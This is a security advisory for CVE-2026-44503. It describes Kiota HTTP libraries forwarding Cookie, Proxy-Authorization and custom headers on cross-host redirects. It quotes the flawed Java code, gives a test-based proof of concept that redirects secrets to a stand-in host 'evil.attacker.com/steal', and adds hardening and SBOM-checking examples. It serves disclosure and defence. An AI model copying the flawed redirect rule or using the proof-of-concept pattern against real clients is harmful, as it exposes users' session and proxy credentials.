GHSA-7j59-v9qr-6fq9

Source
https://github.com/advisories/GHSA-7j59-v9qr-6fq9
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/05/GHSA-7j59-v9qr-6fq9/GHSA-7j59-v9qr-6fq9.json
JSON Data
https://api.osv.dev/v1/vulns/GHSA-7j59-v9qr-6fq9
Aliases
  • CVE-2026-44503
Downstream
Related
Published
2026-05-07T01:49:01Z
Modified
2026-05-07T20:14:23.195802410Z
Severity
  • 7.0 (High) CVSS_V4 - CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N
Summary
Kiota abstractions RedirectHandler leaks Cookie/Proxy-Authorization headers on cross-host redirect
Details

Summary

The RedirectHandler middleware in microsoft/kiota-java (com.microsoft.kiota:microsoft-kiota-http-okHttp v1.9.0) and other Kiota libraries fails to strip sensitive HTTP headers when following 3xx redirects to a different host or scheme.

This vulnerability is present in the RedirectHandlers for:

  • https://github.com/microsoft/kiota-dotnet
  • https://github.com/microsoft/kiota-java
  • https://github.com/microsoft/kiota-python
  • https://github.com/microsoft/kiota-typescript
  • https://github.com/microsoft/kiota-http-go

Details

Only the Authorization header is removed; Cookie, Proxy-Authorization, and all custom headers are forwarded to the redirect target.

This is the default middleware in every kiota-java HTTP client created via KiotaClientFactory.create(). OkHttp's built-in redirect handler (which handles this correctly) is explicitly disabled at line 63 of KiotaClientFactory.java in favor of kiota's broken implementation.

Vulnerable code in RedirectHandler.java lines 107-116 (getRedirect method) in versions 1.9.0 and earlier:

    boolean sameScheme = locationUrl.scheme().equalsIgnoreCase(requestUrl.scheme());
    boolean sameHost = locationUrl.host().toString().equalsIgnoreCase(requestUrl.host().toString());
    if (!sameScheme || !sameHost) {
        requestBuilder.removeHeader("Authorization");
        // BUG: Cookie, Proxy-Authorization, and all other headers are NOT removed
    }
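The rule above, modelled in Python as an added example beside a hardened version. This is example code written for this page, not code from kiota-java or any other Kiota library (kiota-python is in the affected list, which is why Python is used); the function names, the header set and the sample request are the example's own. It goes beyond the quoted rule in two ways: a port change also counts as a new origin, and a relative Location is resolved first, so a same-origin redirect keeps its headers.

```python
"""Cross-origin redirect header policy: the flawed rule next to a hardened one."""
from urllib.parse import urljoin, urlsplit

# Credential-bearing request headers that must never cross an origin boundary.
SENSITIVE_HEADERS = frozenset({"authorization", "proxy-authorization", "cookie"})
_DEFAULT_PORTS = {"http": 80, "https": 443}


def origin(url: str) -> tuple:
    """(scheme, host, port) of a URL, lower-cased, with the default port filled in."""
    parts = urlsplit(url)
    scheme = parts.scheme.lower()
    return scheme, (parts.hostname or "").lower(), parts.port or _DEFAULT_PORTS.get(scheme)


def redirect_headers_vulnerable(request_url: str, location: str, headers: dict) -> dict:
    """The flawed rule quoted in the advisory: when scheme or host changes only
    Authorization is dropped; Cookie, Proxy-Authorization and custom headers survive."""
    target = urljoin(request_url, location)
    src, dst = origin(request_url), origin(target)
    forwarded = dict(headers)
    if src[0] != dst[0] or src[1] != dst[1]:  # compares scheme and host only, never port
        forwarded = {k: v for k, v in forwarded.items() if k.lower() != "authorization"}
    return forwarded


def redirect_headers_hardened(request_url: str, location: str, headers: dict,
                              extra_sensitive=()) -> dict:
    """Drop every credential-bearing header whenever the (scheme, host, port) origin
    changes. Callers register their own secret headers (e.g. X-API-Key) via
    extra_sensitive; an https->http downgrade is an origin change and is covered too."""
    target = urljoin(request_url, location)
    if origin(request_url) == origin(target):
        return dict(headers)  # same origin: forward the request unchanged
    drop = SENSITIVE_HEADERS | {h.lower() for h in extra_sensitive}
    return {k: v for k, v in headers.items() if k.lower() not in drop}


# Constructed sample request carrying the same headers the advisory's PoC attaches.
SAMPLE_HEADERS = {
    "Authorization": "Bearer token",
    "Cookie": "session=SECRET",
    "Proxy-Authorization": "Basic cHJveHk6cGFzcw==",
    "X-API-Key": "k-123",
}


def leaked_headers(request_url: str, location: str, policy, **policy_kwargs) -> set:
    """Names of secret headers a policy would still send to the redirect target."""
    sent = policy(request_url, location, SAMPLE_HEADERS, **policy_kwargs)
    return {k for k in sent if k.lower() in SENSITIVE_HEADERS | {"x-api-key"}}


if __name__ == "__main__":
    src, evil = "https://trusted.example.com/api", "http://evil.attacker.com/steal"
    print("vulnerable leaks:", sorted(leaked_headers(src, evil, redirect_headers_vulnerable)))
    print("hardened leaks:  ", sorted(leaked_headers(src, evil, redirect_headers_hardened,
                                                     extra_sensitive=["X-API-Key"])))
```

The design point is to key the decision on the full origin tuple rather than on a list of well-known header names plus a scheme/host comparison: a client that only knows about Authorization will always miss the next credential header someone adds, while stripping on any origin change fails closed.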

PoC

  1. Clone the repository:

     git clone --depth 1 https://github.com/microsoft/kiota-java.git
     cd kiota-java

  2. Create the PoC test file at: components/http/okHttp/src/test/java/com/microsoft/kiota/http/middleware/SecurityPoC.java

With this content:

package com.microsoft.kiota.http.middleware;

import static org.junit.jupiter.api.Assertions.*;

import com.microsoft.kiota.http.KiotaClientFactory;
import okhttp3.*;
import okhttp3.mockwebserver.*;
import org.junit.jupiter.api.Test;

public class SecurityPoC {
    @Test
    void crossHostRedirectLeaksCookies() throws Exception {
        Request original = new Request.Builder()
                .url("http://trusted.example.com/api")
                .addHeader("Authorization", "Bearer token")
                .addHeader("Cookie", "session=SECRET")
                .addHeader("Proxy-Authorization", "Basic cHJveHk6cGFzcw==")
                .build();
        Response redirect = new Response.Builder()
                .request(original).protocol(Protocol.HTTP_1_1)
                .code(302).message("Found")
                .header("Location", "http://evil.attacker.com/steal")
                .body(ResponseBody.create("", MediaType.parse("text/plain")))
                .build();
        Request result = new RedirectHandler().getRedirect(original, redirect);
        assertNotNull(result);
        assertEquals("evil.attacker.com", result.url().host());
        assertNull(result.header("Authorization")); // stripped (good)
        assertEquals("session=SECRET", result.header("Cookie")); // LEAKED
        assertEquals("Basic cHJveHk6cGFzcw==", result.header("Proxy-Authorization")); // LEAKED
    }

    @Test
    void endToEndProof() throws Exception {
        var evil = new MockWebServer();
        evil.start();
        evil.enqueue(new MockResponse().setResponseCode(200));
        var trusted = new MockWebServer();
        trusted.start();
        trusted.enqueue(new MockResponse().setResponseCode(302)
                .setHeader("Location", evil.url("/steal")));
        OkHttpClient client = KiotaClientFactory.create(
                new Interceptor[]{new RedirectHandler()}).build();
        client.newCall(new Request.Builder().url(trusted.url("/api"))
                .addHeader("Cookie", "session=SECRET").build()).execute();
        trusted.takeRequest();
        RecordedRequest captured = evil.takeRequest();
        assertEquals("session=SECRET", captured.getHeader("Cookie")); // LEAKED to evil server
        evil.shutdown();
        trusted.shutdown();
    }
}
  3. Run the tests: ./gradlew :components:http:okHttp:test --tests "com.microsoft.kiota.http.middleware.SecurityPoC"

  4. Result: BUILD SUCCESSFUL, 2 tests passed, 0 failures. Both tests confirm Cookie and Proxy-Authorization headers are sent to the attacker's server on cross-host redirect.

Impact

The kiota-java bug is more severe than a typical single-header leak because it leaks ALL sensitive headers simultaneously (Cookie + Proxy-Authorization + custom auth headers), not just one type.

Attack scenario: An attacker who can trigger a cross-origin redirect from a trusted API (via open redirect, MITM, or DNS rebinding) captures the victim's session cookies, proxy credentials, and API keys from the redirected request.

Impact:
  • Session hijacking via leaked Cookie headers
  • Corporate proxy credential theft via leaked Proxy-Authorization
  • API key theft via leaked custom auth headers (X-API-Key, etc.)

All consumers of kiota-java are affected, including Microsoft Graph SDK for Java.

Database specific
{
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-07T01:49:01Z",
    "cwe_ids": [
        "CWE-601"
    ],
    "severity": "HIGH",
    "nvd_published_at": null
}
References

Affected packages

Go
github.com/microsoft/kiota-http-go

Package

Name
github.com/microsoft/kiota-http-go
Purl
pkg:golang/github.com/microsoft/kiota-http-go

Affected ranges

Type
SEMVER
Events
Introduced
0 (unknown introduced version; all previous versions are affected)
Fixed
1.5.5

Database specific

source
"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/05/GHSA-7j59-v9qr-6fq9/GHSA-7j59-v9qr-6fq9.json"
Maven
com.microsoft.kiota:microsoft-kiota-abstractions

Package

Name
com.microsoft.kiota:microsoft-kiota-abstractions
Purl
pkg:maven/com.microsoft.kiota/microsoft-kiota-abstractions

Affected ranges

Type
ECOSYSTEM
Events
Introduced
0 (unknown introduced version; all previous versions are affected)
Fixed
1.9.1

Affected versions

0.*
0.1.2
0.2.0
0.2.1
0.3.0
0.3.1
0.3.2
0.3.3
0.4.0
0.4.1
0.4.2
0.4.3
0.4.4
0.4.5
0.4.6
0.4.7
0.5.0
0.6.0
0.7.0
0.7.1
0.7.2
0.7.3
0.7.4
0.7.5
0.7.6
0.7.7
0.7.8
0.8.0
0.9.0
0.9.1
0.9.2
0.10.0
0.11.0
0.11.1
0.11.2
0.12.0
0.12.1
0.12.2
1.*
1.0.0
1.0.1
1.0.2
1.0.3
1.0.4
1.0.5
1.0.6
1.1.0
1.1.1
1.1.2
1.1.3
1.1.4
1.1.5
1.1.6
1.1.7
1.1.8
1.1.9
1.1.10
1.1.11
1.1.12
1.1.13
1.1.14
1.2.0
1.3.0
1.4.0
1.5.0
1.5.1
1.6.0
1.7.0
1.8.0
1.8.1
1.8.2
1.8.3
1.8.4
1.8.5
1.8.6
1.8.7
1.8.8
1.8.9
1.8.10
1.8.11
1.8.12
1.9.0

Database specific

source
"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/05/GHSA-7j59-v9qr-6fq9/GHSA-7j59-v9qr-6fq9.json"
npm
kiota-typescript

Package

Name
kiota-typescript
Purl
pkg:npm/kiota-typescript

Affected ranges

Type
SEMVER
Events
Introduced
0 (unknown introduced version; all previous versions are affected)
Fixed
1.0.0-preview.100

Database specific

source
"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/05/GHSA-7j59-v9qr-6fq9/GHSA-7j59-v9qr-6fq9.json"
NuGet
Microsoft.Kiota.Abstractions

Package

Name
Microsoft.Kiota.Abstractions
Purl
pkg:nuget/Microsoft.Kiota.Abstractions

Affected ranges

Type
ECOSYSTEM
Events
Introduced
0 (unknown introduced version; all previous versions are affected)
Fixed
1.22.0

Affected versions

1.*
1.0.0
1.0.1
1.1.0
1.1.1
1.1.2
1.1.3
1.1.4
1.2.0
1.2.1
1.3.0
1.3.1
1.3.2
1.3.3
1.3.4
1.3.5
1.4.0
1.5.0
1.6.0
1.6.1
1.7.0
1.7.1
1.7.2
1.7.3
1.7.4
1.7.5
1.7.6
1.7.7
1.7.8
1.7.9
1.7.10
1.7.11
1.7.12
1.8.0
1.8.1
1.8.2
1.8.3
1.8.4
1.9.0
1.9.1
1.9.2
1.9.3
1.9.4
1.9.5
1.9.6
1.9.7
1.9.8-preview
1.9.8
1.9.9
1.9.10
1.9.11
1.9.12
1.10.0
1.10.1
1.11.0
1.11.1
1.11.2
1.11.3
1.12.0
1.12.1
1.12.2
1.12.3
1.12.4
1.13.0
1.13.1
1.13.2
1.14.0
1.15.0
1.15.1
1.15.2
1.16.0
1.16.1
1.16.2
1.16.3
1.16.4
1.17.0
1.17.1
1.17.2
1.17.3
1.17.4
1.18.0
1.19.0
1.19.1
1.20.0
1.20.1
1.21.0
1.21.1
1.21.2
1.21.3

Database specific

source
"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/05/GHSA-7j59-v9qr-6fq9/GHSA-7j59-v9qr-6fq9.json"
PyPI
microsoft-kiota-http

Package

Name
microsoft-kiota-http
Purl
pkg:pypi/microsoft-kiota-http

Affected ranges

Type
ECOSYSTEM
Events
Introduced
0 (unknown introduced version; all previous versions are affected)
Fixed
1.9.9

Affected versions

0.*
0.1.0
0.1.1
0.1.2
0.2.0
0.2.1
0.2.2
0.2.3
0.3.0
0.3.1
0.4.0
0.4.1
0.4.2
0.4.3
0.4.4
0.5.0
0.6.0
0.6.1
0.6.2
0.6.3
1.*
1.0.0
1.1.0
1.2.0
1.2.1
1.3.0
1.3.1
1.3.2
1.3.3
1.3.4
1.4.4
1.4.5
1.4.6
1.5.0
1.6.0
1.6.1
1.6.2
1.6.3
1.6.4
1.6.5
1.6.6
1.6.7
1.6.8
1.7.0
1.7.1
1.8.0
1.9.0
1.9.1
1.9.2
1.9.3
1.9.4
1.9.5
1.9.6
1.9.7
1.9.8

Database specific

source
"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/05/GHSA-7j59-v9qr-6fq9/GHSA-7j59-v9qr-6fq9.json"
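A practical check against the affected ranges above, added here as example code (it is not part of the advisory or of any Kiota project): it takes package URLs of the kind an SBOM carries, matches them against the five Purl entries on this page, and compares the version with the first fixed version. Because the page gives no introduced version, every earlier version is treated as affected. The sample SBOM list, the function names and the "affected"/"fixed"/"not-listed" verdict strings are the example's own, and the version comparator assumes semver-style strings (it handles the npm pre-release 1.0.0-preview.100 and Go's v prefix, but not PEP 440 forms such as 1.0rc1).

```python
"""Flag SBOM package URLs that fall inside this advisory's affected ranges."""
from urllib.parse import unquote

# Package URL without version -> first fixed version, copied from "Affected packages".
FIXED_IN = {
    "pkg:golang/github.com/microsoft/kiota-http-go": "1.5.5",
    "pkg:maven/com.microsoft.kiota/microsoft-kiota-abstractions": "1.9.1",
    "pkg:npm/kiota-typescript": "1.0.0-preview.100",
    "pkg:nuget/Microsoft.Kiota.Abstractions": "1.22.0",
    "pkg:pypi/microsoft-kiota-http": "1.9.9",
}
_FIXED_LOWER = {k.lower(): v for k, v in FIXED_IN.items()}  # NuGet/PyPI names are case-insensitive


def version_key(version: str):
    """Sort key for semver-style strings. Release components compare numerically and a
    pre-release sorts below the release it precedes, with numeric pre-release identifiers
    compared as numbers: 1.0.0-preview.99 < 1.0.0-preview.100 < 1.0.0."""
    version = version.lstrip("v").split("+", 1)[0]  # drop Go's 'v' prefix and build metadata
    release, _, pre = version.partition("-")
    nums = tuple(int(part) for part in release.split("."))
    nums += (0,) * (3 - len(nums))  # treat 1.9 as 1.9.0
    if not pre:
        return (nums, 1, ())
    ids = tuple((0, int(p)) if p.isdigit() else (1, p) for p in pre.split("."))
    return (nums, 0, ids)


def split_purl(purl: str):
    """'pkg:type/ns/name@ver?qualifiers#subpath' -> ('pkg:type/ns/name', 'ver' or None)."""
    core = purl.split("?", 1)[0].split("#", 1)[0]
    if "@" in core:
        base, ver = core.rsplit("@", 1)
        return base, unquote(ver)
    return core, None


def verdict(purl: str) -> str:
    """'affected', 'fixed', 'not-listed' or 'unknown-version' for one package URL."""
    base, ver = split_purl(purl)
    fixed = _FIXED_LOWER.get(base.lower())
    if fixed is None:
        return "not-listed"
    if ver is None:
        return "unknown-version"
    return "affected" if version_key(ver) < version_key(fixed) else "fixed"


def scan(purls):
    """Map every package URL in an SBOM to its verdict."""
    return {p: verdict(p) for p in purls}


# Constructed sample SBOM contents; not taken from any real build.
SAMPLE_SBOM = [
    "pkg:maven/com.microsoft.kiota/microsoft-kiota-abstractions@1.9.0",
    "pkg:golang/github.com/microsoft/kiota-http-go@v1.5.4",
    "pkg:npm/kiota-typescript@1.0.0-preview.99",
    "pkg:nuget/Microsoft.Kiota.Abstractions@1.22.0",
    "pkg:pypi/microsoft-kiota-http@1.9.8",
    "pkg:npm/lodash@4.17.21",
]

if __name__ == "__main__":
    for purl, result in scan(SAMPLE_SBOM).items():
        print(f"{result:16} {purl}")
```

Feed it the purl column of a CycloneDX or SPDX SBOM; transitive users such as the Microsoft Graph SDK for Java show up only if the SBOM resolves transitive dependencies, so generate it from the lockfile or build output rather than from the top-level manifest.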